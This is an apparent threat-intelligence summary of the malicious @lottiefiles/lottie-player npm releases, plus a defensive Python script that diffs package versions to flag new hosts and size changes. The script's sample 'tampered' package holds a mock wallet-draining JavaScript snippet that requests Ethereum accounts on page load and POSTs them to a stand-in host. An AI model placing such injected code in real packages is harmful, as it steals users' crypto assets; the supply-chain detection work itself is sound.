
Differential analysis raises red flags over @lottiefiles/lottie-player

· Published 22/11/2024 04:49 · Modified 22/11/2024 09:24


Essential information

Published
22/11/2024 04:49
Modified
22/11/2024 09:24
Tags
2024-11-22, cryptocurrency theft, differential analysis, npm, open-source security, package compromise, supply chain attack
Related entities
6 techniques (mitre)

Description

ReversingLabs researchers discovered malicious versions of the popular npm package @lottiefiles/lottie-player. Versions 2.0.5, 2.0.6, and 2.0.7 were compromised and used to spread code designed to steal assets from crypto wallets. The attackers altered the lottie-player.js file, replacing its code with their own. Differential analysis against the preceding clean release revealed significant changes in package size and behavior, including the introduction of URLs related to Bitcoin exchange services. The compromise was detected quickly, and the LottieFiles maintainers worked with npm to remove the malicious versions. The incident highlights the value of secure development practices such as pinning dependencies to exact versions and regularly assessing the integrity of open-source libraries, in particular by diffing each new release against the one already in use before adopting it.
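The following is an added example, not code from the page, from ReversingLabs or from the LottieFiles project. It shows the kind of differential analysis the description refers to: two versions of an npm package are compared file by file (sha256 per file, size deltas, added and removed files) and the URLs and hosts that appear only in the newer version are pulled out as indicators. The two package versions embedded below are constructed stand-ins, not the real lottie-player files; the hostnames use reserved example domains, and the size thresholds in red_flags are arbitrary assumptions a team would tune for itself. load_npm_tarball is provided so the same diff can be run on real `npm pack` output.

```python
"""Differential analysis of two npm package versions: file-level and URL-level diff."""
import hashlib
import re
import tarfile
from dataclasses import dataclass

# Matches http(s) URLs in raw file bytes; the path stops at whitespace, quotes or brackets.
URL_RE = re.compile(rb"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s'\"<>)]*)?")


@dataclass
class PackageDiff:
    added: list       # files present only in the new version
    removed: list     # files present only in the old version
    changed: list     # (path, old_len, new_len) for files whose sha256 differs
    old_size: int     # total bytes across all files, old version
    new_size: int     # total bytes across all files, new version
    new_urls: set     # URLs that appear in the new version but not in the old
    new_hosts: set    # hosts of those URLs that the old version never referenced


def load_npm_tarball(path: str) -> dict:
    """Read an `npm pack` tarball (files live under package/) into {relative path: bytes}."""
    files = {}
    with tarfile.open(path, "r:gz") as tar:
        for member in tar.getmembers():
            if member.isfile():
                files[member.name.removeprefix("package/")] = tar.extractfile(member).read()
    return files


def _urls(blob: bytes) -> set:
    return {m.group(0).decode("ascii", "replace") for m in URL_RE.finditer(blob)}


def _host(url: str) -> str:
    return re.sub(r"^https?://", "", url).split("/", 1)[0].split(":", 1)[0].lower()


def diff_packages(old: dict, new: dict) -> PackageDiff:
    """Compare two {path: bytes} maps and report structural and network-indicator changes."""
    old_paths, new_paths = set(old), set(new)
    changed = []
    for path in sorted(old_paths & new_paths):
        if hashlib.sha256(old[path]).digest() != hashlib.sha256(new[path]).digest():
            changed.append((path, len(old[path]), len(new[path])))
    old_urls = set().union(*map(_urls, old.values()))
    new_urls = set().union(*map(_urls, new.values()))
    introduced = new_urls - old_urls
    new_hosts = {_host(u) for u in introduced} - {_host(u) for u in old_urls}
    return PackageDiff(
        added=sorted(new_paths - old_paths),
        removed=sorted(old_paths - new_paths),
        changed=changed,
        old_size=sum(map(len, old.values())),
        new_size=sum(map(len, new.values())),
        new_urls=introduced,
        new_hosts=new_hosts,
    )


def red_flags(d: PackageDiff, size_ratio: float = 0.25, file_ratio: float = 0.5) -> list:
    """Turn a diff into human-readable warnings. Thresholds are assumptions, tune per project."""
    flags = []
    if d.new_hosts:
        flags.append("new external hosts contacted: " + ", ".join(sorted(d.new_hosts)))
    if d.old_size and abs(d.new_size - d.old_size) / d.old_size > size_ratio:
        flags.append(f"total package size changed by {100 * (d.new_size - d.old_size) / d.old_size:+.0f}%")
    for path, old_len, new_len in d.changed:
        if old_len and abs(new_len - old_len) / old_len > file_ratio:
            flags.append(f"{path} changed from {old_len} to {new_len} bytes")
    for path in d.added:
        if path.endswith(".js"):
            flags.append(f"new script file added: {path}")
    return flags


# Constructed sample data (NOT the real lottie-player files): a clean release and a tampered
# follow-up whose bundled script was replaced and which gained an extra script file.
CLEAN = {
    "package.json": b'{"name":"@lottiefiles/lottie-player","version":"2.0.4","main":"dist/lottie-player.js"}',
    "dist/lottie-player.js": b"/* lottie-player */\nexport class LottiePlayer{load(s){return fetch(s).then(r=>r.json())}}\n",
    "README.md": b"# lottie-player\nDocs: https://docs.example.org/lottie-player\n",
}
TAMPERED = {
    "package.json": b'{"name":"@lottiefiles/lottie-player","version":"2.0.5","main":"dist/lottie-player.js"}',
    "dist/lottie-player.js": (
        b"/* lottie-player */\n"
        b'(function(){var u="https://api.wallet-drain.example/v1/connect";'
        b"window.addEventListener('load',function(){if(window.ethereum){"
        b"window.ethereum.request({method:'eth_requestAccounts'}).then(function(a){"
        b"fetch(u,{method:'POST',body:JSON.stringify(a)})})}})})();\n"
        b"export class LottiePlayer{load(s){return fetch(s).then(r=>r.json())}}\n"
    ),
    "README.md": b"# lottie-player\nDocs: https://docs.example.org/lottie-player\n",
    "dist/vendor.min.js": b'// helper\nvar rates="https://exchange-rates.example/btc";\n',
}


def analyse(old: dict = CLEAN, new: dict = TAMPERED):
    """Diff two package versions and return (PackageDiff, list of red flags)."""
    d = diff_packages(old, new)
    return d, red_flags(d)


if __name__ == "__main__":
    d, flags = analyse()
    print(f"added={d.added} removed={d.removed} changed={[c[0] for c in d.changed]}")
    print(f"size {d.old_size} -> {d.new_size} bytes; new hosts: {sorted(d.new_hosts)}")
    for f in flags:
        print("RED FLAG:", f)
```

To run this against real releases, fetch both tarballs with `npm pack @scope/name@old` and `npm pack @scope/name@new`, load each with load_npm_tarball, and pass the two maps to analyse. The URL and host extraction is deliberately crude (a plain regex over raw bytes), so it will miss URLs assembled at runtime or hidden by obfuscation; a large unexplained size change in a file that should only have received a minor bump is the more robust signal, and both are only prompts to read the changed code rather than verdicts.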

External references